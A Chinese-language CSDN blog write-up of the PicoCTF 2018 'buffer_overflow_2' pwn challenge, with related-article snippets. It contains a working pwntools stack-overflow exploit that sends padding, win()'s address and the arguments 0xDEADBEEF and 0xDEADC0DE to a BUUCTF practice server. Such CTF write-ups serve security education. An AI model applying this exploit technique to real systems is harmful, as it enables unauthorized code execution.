PicoCTF_2018_buffer_overflow_2

最新推荐文章于 2023-05-20 15:55:21 发布
最新推荐文章于 2023-05-20 15:55:21 发布
阅读量381 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121602835
版权

PicoCTF_2018_buffer_overflow_2

使用checksec查看:
在这里插入图片描述
开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化

唯一做了变动的是win()函数:
在这里插入图片描述
上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1a2

  • a1需要等于0xDEADBEEF
  • a2需要等于0xDEADC0DE

才能读取到flag。

那么直接传参即可,秒了。

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",26088)
# r = process("../buu/PicoCTF_2018_buffer_overflow_2")

#params
win_addr = 0x80485CB

#attack
payload = b'M'*(0x6c + 4) + p32(win_addr) + b'M'*4 +  p32(0xDEADBEEF) + p32(0xDEADC0DE)
r.recv()
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
innodb_buffer_pool_reads、innodb_buffer_pool_read_requests分析与innodb 缓存命中率计算
w1346561235的博客
11-10 3671
澄清一下innodb buffer pool 缓存命中率(cachehit ratio)指标的计算,这个计算涉及到两个状态变量innodb_buffer_pool_reads和innodb_buffer_pool_read_requests。官方文档对这两个变量的解释如下: Innodb_buffer_pool_reads The number of logical reads thatInnoDBcould not satisfy from thebuffer pool, and had...
计算机安全_Lab 2:Buffer Overflow Vulnerability .pdf
06-04
缓冲区溢出定义为程序尝试将数据写入超出预分配的固定长度缓冲区边界的条件。恶意用户可以利用此漏洞来改变程序的流控制,甚至可以执行任意代码。此漏洞由于数据存储(例如缓冲区)和控制存储(例如返回地址)的混合...
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2
Y_peak的博客
03-17 427
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2 简单的栈溢出,不过需要将参数自己设置而已 注意负数如何转换为补码, 不知道也可以直接在汇编里面找 from pwn import * p = remote('node3.buuoj.cn',28931) a1 = 0xdeadbeef a2 = 0xdeadc0de payload = 'a' * (0x6c + 4) + p32(0x080485CB) + p32(0)+ p32(a1) + p32(a2) p.re
BUUCTF:PicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 926
例行检查程序: 还是32位程序,没有canary,很可能是溢出类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢出漏洞,两次溢出,直接去get shell 第一次溢出去泄露libc地址,第二次溢出get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
PicoCTF_2018_buffer_overflow_2详细wp
m0_46204503的博客
11-12 3071
PicoCTF_2018_buffer_overflow_2 知识点 函数调用栈机制(栈溢出) 栈传参 32位程序栈传参,以逆序传入参数,即最后一个参数在最高地址 64位程序前6个参数是寄存器传参,前6个参数分别存在rdi、rsi、rdx、rcx、r8、r9 little trick 如何将一个数转化成底层的二进制的机器码 手算 网上找在线工具,这里不做介绍 在IDA中看汇编代码 因为c代码都可以当做一组汇编指令,比如从上述的0x804861D开始到0x804862D四句汇编指令
picoctf_2018_buffer_overflow_2
z1r0的博客
12-11 189
picoctf_2018_buffer_overflow_2 查看保护 有溢出,还有一个getflag函数,但是想要利用需要给两个参数,结合32位下的系统调用规则即可get flag from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27317) else:
BUUCTF pwn——picoctf_2018_buffer overflow 2
CNS-Enterprise BCC-1701-J
05-20 124
BUUCTF 做题练习
kerio_PF_buffer_overflow.nasl
11-08
kerio_PF_buffer_overflow
lcdproc_buffer_overflow.nasl
最新发布
11-08
lcdproc_buffer_overflow
TFTP-Server-Buffer-Overflow.zip_tftp server
09-23
TFTP Server for Windows 1.4 Buffer Overflow
BUUCTF picoctf_2018_buffer overflow 2
qq_51821131的博客
10-05 1418
picoctf_2018_buffer overflow 2 检查保护,且为32位 明显栈溢出 找到win函数可以打印flag 整合思路,栈溢出,向win函数传入参数并满足条件即可 from pwn import * p=remote('node4.buuoj.cn',25086) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./PicoCTF_2018_buffer_overflow_2') win=0x080485CB a1=0xDE
BUUCTF:PicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1361
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
[BUUCTF]PWN——picoctf_2018_buffer overflow 2
BangSen1的博客
03-31 531
picoctf_2018_buffer overflow 2 例行检查,32位,开启NX保护 运行一下, 用IDA打开。看到了flag.txt,跟进一下。 win函数地址为0x80485cb a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时,输出flag. from pwn import* r=remote('node3.buuoj.cn',26224) payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0x
picoctf_2018_buffer overflow 2
个人笔记
05-05 97
参数a1=0xDEADBEEF+参数a2=0xDEADC0DE。
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 416
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输出flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢出,因为输入的参数可以无限长,所以在执行栈溢出时,程序会造成无效内
PicoCTF_2018_buffer_overflow_1
m0sway的博客
11-28 430
PicoCTF_2018_buffer_overflow_1 使用checksec查看: 保护机制全关,看起来没啥难度。 扔进IDA中查看: 主函数中给出了漏洞函数,跟进查看: gets()函数,栈溢出,s距离ebp0x28 查看下这题的字符串可以发现函数win(): 能够直接获取到flag,直接秒了这题。 exp: from pwn import * #start # r = process("../buu/PicoCTF_2018_buffer_overflow_1") r = remote
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1
Y_peak的博客
03-16 330
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()
PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)
seaaseesa的博客
05-01 842
PicoCTF_2018_buffer_overflow_3 用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。 由于文件内容不变,所以,我们可以直接爆破。 #coding:utf8 from pwn import * shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, passwor...
dp_debug_check_buffer_overflow
05-25
dp_debug_check_buffer_overflow 是一个调试函数,用于检测缓冲区溢出的情况。当程序运行时,如果发现有缓冲区溢出的情况,就会触发 dp_debug_check_buffer_overflow 函数,并打印出相应的调试信息,以便程序员进行调试。 这个函数通常在开发过程中使用,可以帮助程序员及时发现并解决缓冲区溢出的问题,提高程序的稳定性和可靠性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值